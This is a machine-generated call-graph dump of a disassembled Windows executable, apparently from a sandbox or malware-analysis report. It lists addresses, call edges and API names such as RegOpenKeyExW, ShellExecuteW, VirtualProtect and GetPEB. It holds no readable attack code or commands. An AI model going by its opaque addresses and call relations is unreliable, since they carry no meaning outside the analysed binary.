37611d 100934->100935 100936 367667 59 API calls 100935->100936 100937 376128 100936->100937 100938 367667 59 API calls 100937->100938 100939 376133 100938->100939 100940 375a9d 59 API calls 100939->100940 100941 37613e 100940->100941 100942 380db6 Mailbox 59 API calls 100941->100942 100943 376145 RegisterWindowMessageW 100942->100943 100943->100893 100946 3b576f 100945->100946 100947 37fdae 100945->100947 100964 3c9ae7 60 API calls 100946->100964 100949 380db6 Mailbox 59 API calls 100947->100949 100951 37fdb6 100949->100951 100950 3b577a 100951->100897 100952->100904 100953->100906 100965 3c71ed 65 API calls 100953->100965 100955 367667 59 API calls 100954->100955 100956 37ffe7 100955->100956 100957 367667 59 API calls 100956->100957 100958 37ffef 100957->100958 100959 367667 59 API calls 100958->100959 100960 37ff3b 100959->100960 100960->100910 100962 367667 59 API calls 100961->100962 100963 375aa5 100962->100963 100963->100924 100964->100950 100966 3c8d0d 100967 3c8d1a 100966->100967 100968 3c8d20 100966->100968 100969 382d55 _free 58 API calls 100967->100969 100970 3c8d31 100968->100970 100971 382d55 _free 58 API calls 100968->100971 100969->100968 100972 3c8d43 100970->100972 100973 382d55 _free 58 API calls 100970->100973 100971->100970 100973->100972 100974 361055 100979 362649 100974->100979 100977 382d40 __cinit 67 API calls 100978 361064 100977->100978 100980 367667 59 API calls 100979->100980 100981 3626b7 100980->100981 100986 363582 100981->100986 100983 362754 100984 36105a 100983->100984 100989 363416 59 API calls 2 library calls 100983->100989 100984->100977 100990 3635b0 100986->100990 100989->100983 100991 3635a1 100990->100991 100992 3635bd 100990->100992 100991->100983 100992->100991 100993 3635c4 RegOpenKeyExW 100992->100993 100993->100991 100994 3635de RegQueryValueExW 100993->100994 100995 363614 RegCloseKey 100994->100995 100996 3635ff 100994->100996 100995->100991 100996->100995 100997 363633 100998 36366a 100997->100998 100999 3636e7 100998->100999 101000 363688 100998->101000 101041 3636e5 100998->101041 101004 39d0cc 100999->101004 101005 3636ed 100999->101005 101001 363695 101000->101001 101002 36374b PostQuitMessage 101000->101002 101007 3636a0 101001->101007 101008 39d154 101001->101008 101009 3636d8 101002->101009 101003 3636ca DefWindowProcW 101003->101009 101046 371070 10 API calls Mailbox 101004->101046 101010 363715 SetTimer RegisterWindowMessageW 101005->101010 101011 3636f2 101005->101011 101013 363755 101007->101013 101014 3636a8 101007->101014 101062 3c2527 71 API calls _memset 101008->101062 101010->101009 101015 36373e CreatePopupMenu 101010->101015 101017 39d06f 101011->101017 101018 3636f9 KillTimer 101011->101018 101012 39d0f3 101047 371093 332 API calls Mailbox 101012->101047 101044 3644a0 64 API calls _memset 101013->101044 101021 39d139 101014->101021 101022 3636b3 101014->101022 101015->101009 101025 39d0a8 MoveWindow 101017->101025 101026 39d074 101017->101026 101042 36443a Shell_NotifyIconW _memset 101018->101042 101021->101003 101061 3b7c36 59 API calls Mailbox 101021->101061 101028 3636be 101022->101028 101029 39d124 101022->101029 101023 39d166 101023->101003 101023->101009 101025->101009 101031 39d078 101026->101031 101032 39d097 SetFocus 101026->101032 101027 36370c 101043 363114 DeleteObject DestroyWindow Mailbox 101027->101043 101028->101003 101048 36443a Shell_NotifyIconW _memset 101028->101048 101060 3c2d36 81 API calls _memset 101029->101060 101030 363764 101030->101009 101031->101028 101035 39d081 101031->101035 101032->101009 101045 371070 10 API calls Mailbox 101035->101045 101039 39d118 101049 36434a 101039->101049 101041->101003 101042->101027 101043->101009 101044->101030 101045->101009 101046->101012 101047->101028 101048->101039 101050 364375 _memset 101049->101050 101063 364182 101050->101063 101054 364414 Shell_NotifyIconW 101056 364422 101054->101056 101055 364430 Shell_NotifyIconW 101055->101056 101067 36407c 101056->101067 101057 3643fa 101057->101054 101057->101055 101059 364429 101059->101041 101060->101030 101061->101041 101062->101023 101064 364196 101063->101064 101065 39d423 101063->101065 101064->101057 101089 3c2f94 62 API calls _W_store_winword 101064->101089 101065->101064 101066 39d42c DestroyIcon 101065->101066 101066->101064 101068 364098 101067->101068 101088 36416f Mailbox 101067->101088 101090 367a16 101068->101090 101071 39d3c8 LoadStringW 101075 39d3e2 101071->101075 101072 3640b3 101073 367bcc 59 API calls 101072->101073 101074 3640c8 101073->101074 101074->101075 101076 3640d9 101074->101076 101077 367b2e 59 API calls 101075->101077 101078 364174 101076->101078 101079 3640e3 101076->101079 101080 39d3ec 101077->101080 101104 368047 101078->101104 101095 367b2e 101079->101095 101085 3640ed _memset _wcscpy 101080->101085 101108 367cab 101080->101108 101084 39d40e 101086 367cab 59 API calls 101084->101086 101087 364155 Shell_NotifyIconW 101085->101087 101086->101085 101087->101088 101088->101059 101089->101057 101091 380db6 Mailbox 59 API calls 101090->101091 101092 367a3b 101091->101092 101093 368029 59 API calls 101092->101093 101094 3640a6 101093->101094 101094->101071 101094->101072 101096 39ec6b 101095->101096 101097 367b40 101095->101097 101121 3b7bdb 59 API calls _memmove 101096->101121 101115 367a51 101097->101115 101100 367b4c 101100->101085 101101 39ec75 101102 368047 59 API calls 101101->101102 101103 39ec7d Mailbox 101102->101103 101105 368052 101104->101105 101106 36805a 101104->101106 101122 367f77 59 API calls 2 library calls 101105->101122 101106->101085 101109 39ed4a 101108->101109 101110 367cbf 101108->101110 101112 368029 59 API calls 101109->101112 101123 367c50 101110->101123 101114 39ed55 __wsetenvp _memmove 101112->101114 101113 367cca 101113->101084 101116 367a5f 101115->101116 101117 367a85 _memmove 101115->101117 101116->101117 101118 380db6 Mailbox 59 API calls 101116->101118 101117->101100 101117->101117 101119 367ad4 101118->101119 101120 380db6 Mailbox 59 API calls 101119->101120 101120->101117 101121->101101 101122->101106 101124 367c5f __wsetenvp 101123->101124 101125 368029 59 API calls 101124->101125 101126 367c70 _memmove 101124->101126 101127 39ed07 _memmove 101125->101127 101126->101113 101128 3a416f 101132 3b5fe6 101128->101132 101130 3a417a 101131 3b5fe6 86 API calls 101130->101131 101131->101130 101133 3b6020 101132->101133 101137 3b5ff3 101132->101137 101133->101130 101134 3b6022 101162 369328 85 API calls Mailbox 101134->101162 101135 3b6027 101143 369837 101135->101143 101137->101133 101137->101134 101137->101135 101141 3b601a 101137->101141 101140 367b2e 59 API calls 101140->101133 101161 3695a0 59 API calls _wcsstr 101141->101161 101144 369851 101143->101144 101153 36984b 101143->101153 101145 369899 101144->101145 101146 369857 __itow 101144->101146 101147 39f5d3 __i64tow 101144->101147 101151 39f4da 101144->101151 101167 383698 84 API calls 3 library calls 101145->101167 101150 380db6 Mailbox 59 API calls 101146->101150 101152 369871 101150->101152 101154 380db6 Mailbox 59 API calls 101151->101154 101159 39f552 Mailbox _wcscpy 101151->101159 101152->101153 101163 367de1 101152->101163 101153->101140 101157 39f51f 101154->101157 101156 380db6 Mailbox 59 API calls 101158 39f545 101156->101158 101157->101156 101158->101159 101160 367de1 59 API calls 101158->101160 101168 383698 84 API calls 3 library calls 101159->101168 101160->101159 101161->101133 101162->101135 101164 367df0 __wsetenvp _memmove 101163->101164 101165 380db6 Mailbox 59 API calls 101164->101165 101166 367e2e 101165->101166 101166->101153 101167->101146 101168->101147 101169 39fdfc 101174 36ab30 Mailbox _memmove 101169->101174 101173 380db6 59 API calls Mailbox 101173->101174 101174->101173 101176 36b525 101174->101176 101194 367de1 59 API calls 101174->101194 101197 36a057 101174->101197 101199 369f37 Mailbox 101174->101199 101203 36b2b6 101174->101203 101206 3a086a 101174->101206 101208 3a0878 101174->101208 101210 3a085c 101174->101210 101211 36b21c 101174->101211 101215 3b6e8f 59 API calls 101174->101215 101218 3ddf23 101174->101218 101221 3ddf37 101174->101221 101226 369ea0 101174->101226 101250 369c90 59 API calls Mailbox 101174->101250 101254 3dc193 86 API calls 2 library calls 101174->101254 101255 3dc2e0 97 API calls Mailbox 101174->101255 101256 3c7956 59 API calls Mailbox 101174->101256 101257 3dbc6b 332 API calls Mailbox 101174->101257 101258 3b617e 59 API calls Mailbox 101174->101258 101260 3c9e4a 90 API calls 4 library calls 101176->101260 101178 3a09e5 101266 3c9e4a 90 API calls 4 library calls 101178->101266 101179 3a0055 101259 3c9e4a 90 API calls 4 library calls 101179->101259 101182 36b475 101188 368047 59 API calls 101182->101188 101184 3a0064 101185 380db6 59 API calls Mailbox 101185->101199 101186 368047 59 API calls 101186->101199 101188->101197 101191 367667 59 API calls 101191->101199 101192 36b47a 101192->101178 101192->101179 101193 3b6e8f 59 API calls 101193->101199 101194->101174 101195 3a09d6 101265 3c9e4a 90 API calls 4 library calls 101195->101265 101198 382d40 67 API calls __cinit 101198->101199 101199->101179 101199->101182 101199->101185 101199->101186 101199->101191 101199->101192 101199->101193 101199->101195 101199->101197 101199->101198 101200 36a55a 101199->101200 101224 36c8c0 332 API calls 2 library calls 101199->101224 101225 36b900 60 API calls Mailbox 101199->101225 101264 3c9e4a 90 API calls 4 library calls 101200->101264 101253 36f6a3 332 API calls 101203->101253 101262 369c90 59 API calls Mailbox 101206->101262 101263 3c9e4a 90 API calls 4 library calls 101208->101263 101210->101197 101261 3b617e 59 API calls Mailbox 101210->101261 101251 369d3c 60 API calls Mailbox 101211->101251 101213 36b22d 101252 369d3c 60 API calls Mailbox 101213->101252 101215->101174 101267 3dcadd 101218->101267 101220 3ddf33 101220->101174 101222 3dcadd 131 API calls 101221->101222 101223 3ddf47 101222->101223 101223->101174 101224->101199 101225->101199 101227 369ebf 101226->101227 101245 369eed Mailbox 101226->101245 101228 380db6 Mailbox 59 API calls 101227->101228 101228->101245 101229 382d40 67 API calls __cinit 101229->101245 101230 36b475 101231 368047 59 API calls 101230->101231 101244 36a057 101231->101244 101232 3b6e8f 59 API calls 101232->101245 101233 36b47a 101234 3a0055 101233->101234 101248 3a09e5 101233->101248 101394 3c9e4a 90 API calls 4 library calls 101234->101394 101236 380db6 59 API calls Mailbox 101236->101245 101239 3a0064 101239->101174 101240 368047 59 API calls 101240->101245 101243 367667 59 API calls 101243->101245 101244->101174 101245->101229 101245->101230 101245->101232 101245->101233 101245->101234 101245->101236 101245->101240 101245->101243 101245->101244 101246 3a09d6 101245->101246 101249 36a55a 101245->101249 101392 36c8c0 332 API calls 2 library calls 101245->101392 101393 36b900 60 API calls Mailbox 101245->101393 101396 3c9e4a 90 API calls 4 library calls 101246->101396 101397 3c9e4a 90 API calls 4 library calls 101248->101397 101395 3c9e4a 90 API calls 4 library calls 101249->101395 101250->101174 101251->101213 101252->101203 101253->101176 101254->101174 101255->101174 101256->101174 101257->101174 101258->101174 101259->101184 101260->101210 101261->101197 101262->101210 101263->101210 101264->101197 101265->101178 101266->101197 101268 369837 85 API calls 101267->101268 101269 3dcb1a 101268->101269 101288 3dcb61 Mailbox 101269->101288 101305 3dd7a5 101269->101305 101271 3dcdb9 101272 3dcf2e 101271->101272 101276 3dcdc7 101271->101276 101355 3dd8c8 93 API calls Mailbox 101272->101355 101275 3dcf3d 101275->101276 101277 3dcf49 101275->101277 101318 3dc96e 101276->101318 101277->101288 101278 369837 85 API calls 101293 3dcbb2 Mailbox 101278->101293 101283 3dce00 101333 380c08 101283->101333 101286 3dce1a 101339 3c9e4a 90 API calls 4 library calls 101286->101339 101287 3dce33 101340 3692ce 101287->101340 101288->101220 101292 3dce25 GetCurrentProcess TerminateProcess 101292->101287 101293->101271 101293->101278 101293->101288 101337 3dfbce 59 API calls 2 library calls 101293->101337 101338 3dcfdf 61 API calls 2 library calls 101293->101338 101297 3dcfa4 101297->101288 101301 3dcfb8 FreeLibrary 101297->101301 101298 3dce6b 101352 3dd649 108 API calls _free 101298->101352 101301->101288 101304 3dce7c 101304->101297 101353 368d40 59 API calls Mailbox 101304->101353 101354 369d3c 60 API calls Mailbox 101304->101354 101356 3dd649 108 API calls _free 101304->101356 101306 367e4f 59 API calls 101305->101306 101307 3dd7c0 CharLowerBuffW 101306->101307 101357 3bf167 101307->101357 101311 367667 59 API calls 101312 3dd7f9 101311->101312 101364 36784b 101312->101364 101314 3dd858 Mailbox 101314->101293 101315 3dd810 101316 367d2c 59 API calls 101315->101316 101317 3dd81c Mailbox 101316->101317 101317->101314 101377 3dcfdf 61 API calls 2 library calls 101317->101377 101319 3dc989 101318->101319 101320 3dc9de 101318->101320 101321 380db6 Mailbox 59 API calls 101319->101321 101324 3dda50 101320->101324 101323 3dc9ab 101321->101323 101322 380db6 Mailbox 59 API calls 101322->101323 101323->101320 101323->101322 101325 3ddc79 Mailbox 101324->101325 101332 3dda73 _strcat _wcscpy __wsetenvp 101324->101332 101325->101283 101326 369b98 59 API calls 101326->101332 101327 369be6 59 API calls 101327->101332 101328 369b3c 59 API calls 101328->101332 101329 369837 85 API calls 101329->101332 101330 38571c 58 API calls __crtGetStringTypeA_stat 101330->101332 101332->101325 101332->101326 101332->101327 101332->101328 101332->101329 101332->101330 101381 3c5887 61 API calls 2 library calls 101332->101381 101334 380c1d 101333->101334 101335 380cb5 VirtualProtect 101334->101335 101336 380c83 101334->101336 101335->101336 101336->101286 101336->101287 101337->101293 101338->101293 101339->101292 101341 3692d6 101340->101341 101342 380db6 Mailbox 59 API calls 101341->101342 101343 3692e4 101342->101343 101344 3692f0 101343->101344 101382 3691fc 59 API calls Mailbox 101343->101382 101346 369050 101344->101346 101383 369160 101346->101383 101348 380db6 Mailbox 59 API calls 101349 3690fb 101348->101349 101349->101304 101351 368d40 59 API calls Mailbox 101349->101351 101350 36905f 101350->101348 101350->101349 101351->101298 101352->101304 101353->101304 101354->101304 101355->101275 101356->101304 101358 3bf192 __wsetenvp 101357->101358 101359 3bf1d1 101358->101359 101362 3bf1c7 101358->101362 101363 3bf278 101358->101363 101359->101311 101359->101317 101362->101359 101378 3678c4 61 API calls 101362->101378 101363->101359 101379 3678c4 61 API calls 101363->101379 101365 3678b7 101364->101365 101366 36785a 101364->101366 101367 367d2c 59 API calls 101365->101367 101366->101365 101368 367865 101366->101368 101374 367888 _memmove 101367->101374 101369 39eb09 101368->101369 101370 367880 101368->101370 101371 368029 59 API calls 101369->101371 101380 367f27 59 API calls Mailbox 101370->101380 101373 39eb13 101371->101373 101375 380db6 Mailbox 59 API calls 101373->101375 101374->101315 101376 39eb33 101375->101376 101377->101314 101378->101362 101379->101363 101380->101374 101381->101332 101382->101344 101384 369169 Mailbox 101383->101384 101385 39f19f 101384->101385 101390 369173 101384->101390 101386 380db6 Mailbox 59 API calls 101385->101386 101388 39f1ab 101386->101388 101387 36917a 101387->101350 101390->101387 101391 369c90 59 API calls Mailbox 101390->101391 101391->101390 101392->101245 101393->101245 101394->101239 101395->101244 101396->101248 101397->101244 101398 1671180 101412 166edd0 101398->101412 101400 1671236 101415 1671070 101400->101415 101418 1672260 GetPEB 101412->101418 101414 166f45b 101414->101400 101416 1671079 Sleep 101415->101416 101417 1671087 101416->101417 101419 167228a 101418->101419 101419->101414 101420 36107d 101425 36708b 101420->101425 101422 36108c 101423 382d40 __cinit 67 API calls 101422->101423 101424 361096 101423->101424 101426 36709b __write_nolock 101425->101426 101427 367667 59 API calls 101426->101427 101428 367151 101427->101428 101456 364706 101428->101456 101430 36715a 101463 38050b 101430->101463 101433 367cab 59 API calls 101434 367173 101433->101434 101469 363f74 101434->101469 101437 367667 59 API calls 101438 36718b 101437->101438 101475 367d8c 101438->101475 101440 367194 RegOpenKeyExW 101441 39e8b1 RegQueryValueExW 101440->101441 101445 3671b6 Mailbox 101440->101445 101442 39e8ce 101441->101442 101443 39e943 RegCloseKey 101441->101443 101444 380db6 Mailbox 59 API calls 101442->101444 101443->101445 101448 39e955 _wcscat Mailbox __wsetenvp 101443->101448 101446 39e8e7 101444->101446 101445->101422 101479 36522e 101446->101479 101448->101445 101453 3679f2 59 API calls 101448->101453 101454 367de1 59 API calls 101448->101454 101455 363f74 59 API calls 101448->101455 101450 39e90f 101451 367bcc 59 API calls 101450->101451 101452 39e929 101451->101452 101452->101443 101453->101448 101454->101448 101455->101448 101482 391940 101456->101482 101459 367de1 59 API calls 101460 364739 101459->101460 101484 364750 101460->101484 101462 364743 Mailbox 101462->101430 101464 391940 __write_nolock 101463->101464 101465 380518 GetFullPathNameW 101464->101465 101466 38053a 101465->101466 101467 367bcc 59 API calls 101466->101467 101468 367165 101467->101468 101468->101433 101470 363f82 101469->101470 101474 363fa4 _memmove 101469->101474 101472 380db6 Mailbox 59 API calls 101470->101472 101471 380db6 Mailbox 59 API calls 101473 363fb8 101471->101473 101472->101474 101473->101437 101474->101471 101476 367da6 101475->101476 101478 367d99 101475->101478 101477 380db6 Mailbox 59 API calls 101476->101477 101477->101478 101478->101440 101480 380db6 Mailbox 59 API calls 101479->101480 101481 365240 RegQueryValueExW 101480->101481 101481->101450 101481->101452 101483 364713 GetModuleFileNameW 101482->101483 101483->101459 101485 391940 __write_nolock 101484->101485 101486 36475d GetFullPathNameW 101485->101486 101487 36477c 101486->101487 101488 364799 101486->101488 101489 367bcc 59 API calls 101487->101489 101490 367d8c 59 API calls 101488->101490 101491 364788 101489->101491 101490->101491 101492 367726 59 API calls 101491->101492 101493 364794 101492->101493 101493->101462 101494 387c56 101495 387c62 __ioinit 101494->101495 101531 389e08 GetStartupInfoW 101495->101531 101498 387c67 101533 388b7c GetProcessHeap 101498->101533 101499 387cbf 101500 387cca 101499->101500 101616 387da6 58 API calls 3 library calls 101499->101616 101534 389ae6 101500->101534 101503 387cd0 101504 387cdb __RTC_Initialize 101503->101504 101617 387da6 58 API calls 3 library calls 101503->101617 101555 38d5d2 101504->101555 101507 387cea 101508 387cf6 GetCommandLineW 101507->101508 101618 387da6 58 API calls 3 library calls 101507->101618 101574 394f23 GetEnvironmentStringsW 101508->101574 101511 387cf5 101511->101508 101514 387d10 101515 387d1b 101514->101515 101619 3830b5 58 API calls 3 library calls 101514->101619 101584 394d58 101515->101584 101518 387d21 101519 387d2c 101518->101519 101620 3830b5 58 API calls 3 library calls 101518->101620 101598 3830ef 101519->101598 101522 387d34 101523 387d3f __wwincmdln 101522->101523 101621 3830b5 58 API calls 3 library calls 101522->101621 101604 3647d0 101523->101604 101526 387d53 101527 387d62 101526->101527 101622 383358 58 API calls _doexit 101526->101622 101623 3830e0 58 API calls _doexit 101527->101623 101530 387d67 __ioinit 101532 389e1e 101531->101532 101532->101498 101533->101499 101624 383187 36 API calls 2 library calls 101534->101624 101536 389aeb 101625 389d3c InitializeCriticalSectionAndSpinCount __ioinit 101536->101625 101538 389af0 101539 389af4 101538->101539 101627 389d8a TlsAlloc 101538->101627 101626 389b5c 61 API calls 2 library calls 101539->101626 101542 389af9 101542->101503 101543 389b06 101543->101539 101544 389b11 101543->101544 101628 3887d5 101544->101628 101547 389b53 101636 389b5c 61 API calls 2 library calls 101547->101636 101550 389b58 101550->101503 101551 389b32 101551->101547 101552 389b38 101551->101552 101635 389a33 58 API calls 4 library calls 101552->101635 101554 389b40 GetCurrentThreadId 101554->101503 101556 38d5de __ioinit 101555->101556 101557 389c0b __lock 58 API calls 101556->101557 101558 38d5e5 101557->101558 101559 3887d5 __calloc_crt 58 API calls 101558->101559 101560 38d5f6 101559->101560 101561 38d661 GetStartupInfoW 101560->101561 101562 38d601 __ioinit @_EH4_CallFilterFunc@8 101560->101562 101568 38d676 101561->101568 101571 38d7a5 101561->101571 101562->101507 101563 38d86d 101650 38d87d LeaveCriticalSection _doexit 101563->101650 101565 3887d5 __calloc_crt 58 API calls 101565->101568 101566 38d7f2 GetStdHandle 101566->101571 101567 38d805 GetFileType 101567->101571 101568->101565 101570 38d6c4 101568->101570 101568->101571 101569 38d6f8 GetFileType 101569->101570 101570->101569 101570->101571 101648 389e2b InitializeCriticalSectionAndSpinCount 101570->101648 101571->101563 101571->101566 101571->101567 101649 389e2b InitializeCriticalSectionAndSpinCount 101571->101649 101575 387d06 101574->101575 101576 394f34 101574->101576 101580 394b1b GetModuleFileNameW 101575->101580 101651 38881d 58 API calls 2 library calls 101576->101651 101578 394f5a _memmove 101579 394f70 FreeEnvironmentStringsW 101578->101579 101579->101575 101582 394b4f _wparse_cmdline 101580->101582 101581 394b8f _wparse_cmdline 101581->101514 101582->101581 101652 38881d 58 API calls 2 library calls 101582->101652 101585 394d69 101584->101585 101586 394d71 __wsetenvp 101584->101586 101585->101518 101587 3887d5 __calloc_crt 58 API calls 101586->101587 101591 394d9a __wsetenvp 101587->101591 101588 394df1 101589 382d55 _free 58 API calls 101588->101589 101589->101585 101590 3887d5 __calloc_crt 58 API calls 101590->101591 101591->101585 101591->101588 101591->101590 101592 394e16 101591->101592 101595 394e2d 101591->101595 101653 394607 58 API calls __wsopen_nolock 101591->101653 101593 382d55 _free 58 API calls 101592->101593 101593->101585 101654 388dc6 IsProcessorFeaturePresent 101595->101654 101597 394e39 101597->101518 101600 3830fb __IsNonwritableInCurrentImage 101598->101600 101677 38a4d1 101600->101677 101601 383119 __initterm_e 101602 382d40 __cinit 67 API calls 101601->101602 101603 383138 _doexit __IsNonwritableInCurrentImage 101601->101603 101602->101603 101603->101522 101605 3647ea 101604->101605 101615 364889 101604->101615 101606 364824 IsThemeActive 101605->101606 101680 38336c 101606->101680 101610 364850 101692 3648fd SystemParametersInfoW SystemParametersInfoW 101610->101692 101612 36485c 101693 363b3a 101612->101693 101614 364864 SystemParametersInfoW 101614->101615 101615->101526 101616->101500 101617->101504 101618->101511 101622->101527 101623->101530 101624->101536 101625->101538 101626->101542 101627->101543 101630 3887dc 101628->101630 101631 388817 101630->101631 101633 3887fa 101630->101633 101637 3951f6 101630->101637 101631->101547 101634 389de6 TlsSetValue 101631->101634 101633->101630 101633->101631 101645 38a132 Sleep 101633->101645 101634->101551 101635->101554 101636->101550 101638 395201 101637->101638 101641 39521c 101637->101641 101639 39520d 101638->101639 101638->101641 101646 388b28 58 API calls __getptd_noexit 101639->101646 101640 39522c RtlAllocateHeap 101640->101641 101643 395212 101640->101643 101641->101640 101641->101643 101647 3833a1 DecodePointer 101641->101647 101643->101630 101645->101633 101646->101643 101647->101641 101648->101570 101649->101571 101650->101562 101651->101578 101652->101581 101653->101591 101655 388dd1 101654->101655 101660 388c59 101655->101660 101659 388dec 101659->101597 101661 388c73 _memset __call_reportfault 101660->101661 101662 388c93 IsDebuggerPresent 101661->101662 101668 38a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 101662->101668 101665 388d7a 101667 38a140 GetCurrentProcess TerminateProcess 101665->101667 101666 388d57 __call_reportfault 101669 38c5f6 101666->101669 101667->101659 101668->101666 101670 38c5fe 101669->101670 101671 38c600 IsProcessorFeaturePresent 101669->101671 101670->101665 101673 39590a 101671->101673 101676 3958b9 5 API calls 2 library calls 101673->101676 101675 3959ed 101675->101665 101676->101675 101678 38a4d4 EncodePointer 101677->101678 101678->101678 101679 38a4ee 101678->101679 101679->101601 101681 389c0b __lock 58 API calls 101680->101681 101682 383377 DecodePointer EncodePointer 101681->101682 101745 389d75 LeaveCriticalSection 101682->101745 101684 364849 101685 3833d4 101684->101685 101686 3833f8 101685->101686 101687 3833de 101685->101687 101686->101610 101687->101686 101746 388b28 58 API calls __getptd_noexit 101687->101746 101689 3833e8 101747 388db6 9 API calls __wsopen_nolock 101689->101747 101691 3833f3 101691->101610 101692->101612 101694 363b47 __write_nolock 101693->101694 101695 367667 59 API calls 101694->101695 101696 363b51 GetCurrentDirectoryW 101695->101696 101748 363766 101696->101748 101698 363b7a IsDebuggerPresent 101699 39d272 MessageBoxA 101698->101699 101700 363b88 101698->101700 101703 39d28c 101699->101703 101701 363c61 101700->101701 101700->101703 101704 363ba5 101700->101704 101702 363c68 SetCurrentDirectoryW 101701->101702 101707 363c75 Mailbox 101702->101707 101947 367213 59 API calls Mailbox 101703->101947 101829 367285 101704->101829 101707->101614 101708 39d29c 101713 39d2b2 SetCurrentDirectoryW 101708->101713 101710 363bc3 GetFullPathNameW 101711 367bcc 59 API calls 101710->101711 101712 363bfe 101711->101712 101845 37092d 101712->101845 101713->101707 101716 363c1c 101717 363c26 101716->101717 101948 3b874b AllocateAndInitializeSid CheckTokenMembership FreeSid 101716->101948 101861 363a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 101717->101861 101721 39d2cf 101721->101717 101723 39d2e0 101721->101723 101724 364706 61 API calls 101723->101724 101727 39d2e8 101724->101727 101725 363c43 101869 3709d0 101725->101869 101726 363c30 101726->101725 101728 36434a 68 API calls 101726->101728 101730 367de1 59 API calls 101727->101730 101728->101725 101732 39d2f5 101730->101732 101731 363c4e 101731->101701 101946 36443a Shell_NotifyIconW _memset 101731->101946 101733 39d2ff 101732->101733 101734 39d324 101732->101734 101736 367cab 59 API calls 101733->101736 101737 367cab 59 API calls 101734->101737 101738 39d30a 101736->101738 101739 39d320 GetForegroundWindow ShellExecuteW 101737->101739 101741 367b2e 59 API calls 101738->101741 101742 39d354 Mailbox 101739->101742 101743 39d317 101741->101743 101742->101701 101744 367cab 59 API calls 101743->101744 101744->101739 101745->101684 101746->101689 101747->101691 101749 367667 59 API calls 101748->101749 101750 36377c 101749->101750 101949 363d31 101750->101949 101752 36379a 101753 364706 61 API calls 101752->101753 101754 3637ae 101753->101754 101755 367de1 59 API calls 101754->101755 101756 3637bb 101755->101756 101963 364ddd 101756->101963 101759 39d173 102019 3c955b 101759->102019 101760 3637dc Mailbox 101764 368047 59 API calls 101760->101764 101763 39d192 101766 382d55 _free 58 API calls 101763->101766 101767 3637ef 101764->101767 101768 39d19f 101766->101768 101987 36928a 101767->101987 101770 364e4a 84 API calls 101768->101770 101772 39d1a8 101770->101772 101776 363ed0 59 API calls 101772->101776 101773 367de1 59 API calls 101774 363808 101773->101774 101990 3684c0 101774->101990 101778 39d1c3 101776->101778 101777 36381a Mailbox 101779 367de1 59 API calls 101777->101779 101780 363ed0 59 API calls 101778->101780 101781 363840 101779->101781 101782 39d1df 101780->101782 101783 3684c0 69 API calls 101781->101783 101784 364706 61 API calls 101782->101784 101786 36384f Mailbox 101783->101786 101785 39d204 101784->101785 101787 363ed0 59 API calls 101785->101787 101789 367667 59 API calls 101786->101789 101788 39d210 101787->101788 101790 368047 59 API calls 101788->101790 101791 36386d 101789->101791 101792 39d21e 101790->101792 101994 363ed0 101791->101994 101794 363ed0 59 API calls 101792->101794 101796 39d22d 101794->101796 101802 368047 59 API calls 101796->101802 101798 363887 101798->101772 101799 363891 101798->101799 101800 382efd _W_store_winword 60 API calls 101799->101800 101801 36389c 101800->101801 101801->101778 101803 3638a6 101801->101803 101804 39d24f 101802->101804 101805 382efd _W_store_winword 60 API calls 101803->101805 101806 363ed0 59 API calls 101804->101806 101807 3638b1 101805->101807 101808 39d25c 101806->101808 101807->101782 101809 3638bb 101807->101809 101808->101808 101810 382efd _W_store_winword 60 API calls 101809->101810 101811 3638c6 101810->101811 101811->101796 101812 363907 101811->101812 101814 363ed0 59 API calls 101811->101814 101812->101796 101813 363914 101812->101813 101815 3692ce 59 API calls 101813->101815 101816 3638ea 101814->101816 101817 363924 101815->101817 101818 368047 59 API calls 101816->101818 101819 369050 59 API calls 101817->101819 101820 3638f8 101818->101820 101821 363932 101819->101821 101822 363ed0 59 API calls 101820->101822 102010 368ee0 101821->102010 101822->101812 101824 36928a 59 API calls 101826 36394f 101824->101826 101825 368ee0 60 API calls 101825->101826 101826->101824 101826->101825 101827 363ed0 59 API calls 101826->101827 101828 363995 Mailbox 101826->101828 101827->101826 101828->101698 101830 367292 __write_nolock 101829->101830 101831 39ea22 _memset 101830->101831 101832 3672ab 101830->101832 101835 39ea3e GetOpenFileNameW 101831->101835 101833 364750 60 API calls 101832->101833 101834 3672b4 101833->101834 102628 380791 101834->102628 101837 39ea8d 101835->101837 101838 367bcc 59 API calls 101837->101838 101840 39eaa2 101838->101840 101840->101840 101842 3672c9 102646 36686a 101842->102646 101846 37093a __write_nolock 101845->101846 102884 366d80 101846->102884 101848 37093f 101849 363c14 101848->101849 102895 37119e 90 API calls 101848->102895 101849->101708 101849->101716 101851 37094c 101851->101849 102896 373ee7 92 API calls Mailbox 101851->102896 101853 370955 101853->101849 101854 370959 GetFullPathNameW 101853->101854 101855 367bcc 59 API calls 101854->101855 101856 370985 101855->101856 101857 367bcc 59 API calls 101856->101857 101858 370992 101857->101858 101859 3a4cab _wcscat 101858->101859 101860 367bcc 59 API calls 101858->101860 101860->101849 101862 363ab0 LoadImageW RegisterClassExW 101861->101862 101863 39d261 101861->101863 102929 363041 7 API calls 101862->102929 102930 3647a0 LoadImageW EnumResourceNamesW 101863->102930 101866 363b34 101868 3639d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 101866->101868 101867 39d26a 101868->101726 101870 3a4cc3 101869->101870 101884 3709f5 101869->101884 102987 3c9e4a 90 API calls 4 library calls 101870->102987 101872 370cfa 101872->101731 101874 370ee4 101874->101872 101876 370ef1 101874->101876 102985 371093 332 API calls Mailbox 101876->102985 101877 370a4b PeekMessageW 101945 370a05 Mailbox 101877->101945 101879 370ef8 LockWindowUpdate DestroyWindow GetMessageW 101879->101872 101882 370f2a 101879->101882 101881 3a4e81 Sleep 101881->101945 101886 3a5c58 TranslateMessage DispatchMessageW GetMessageW 101882->101886 101883 370ce4 101883->101872 102984 371070 10 API calls Mailbox 101883->102984 101884->101945 102988 369e5d 60 API calls 101884->102988 102989 3b6349 332 API calls 101884->102989 101886->101886 101887 3a5c88 101886->101887 101887->101872 101888 370ea5 TranslateMessage DispatchMessageW 101889 370e43 PeekMessageW 101888->101889 101889->101945 101890 3a4d50 TranslateAcceleratorW 101890->101889 101890->101945 101891 369e5d 60 API calls 101891->101945 101892 370d13 timeGetTime 101892->101945 101893 3a581f WaitForSingleObject 101895 3a583c GetExitCodeProcess CloseHandle 101893->101895 101893->101945 101931 370f95 101895->101931 101896 370e5f Sleep 101930 370e70 Mailbox 101896->101930 101897 368047 59 API calls 101897->101945 101898 367667 59 API calls 101898->101930 101899 3a5af8 Sleep 101899->101930 101901 380db6 59 API calls Mailbox 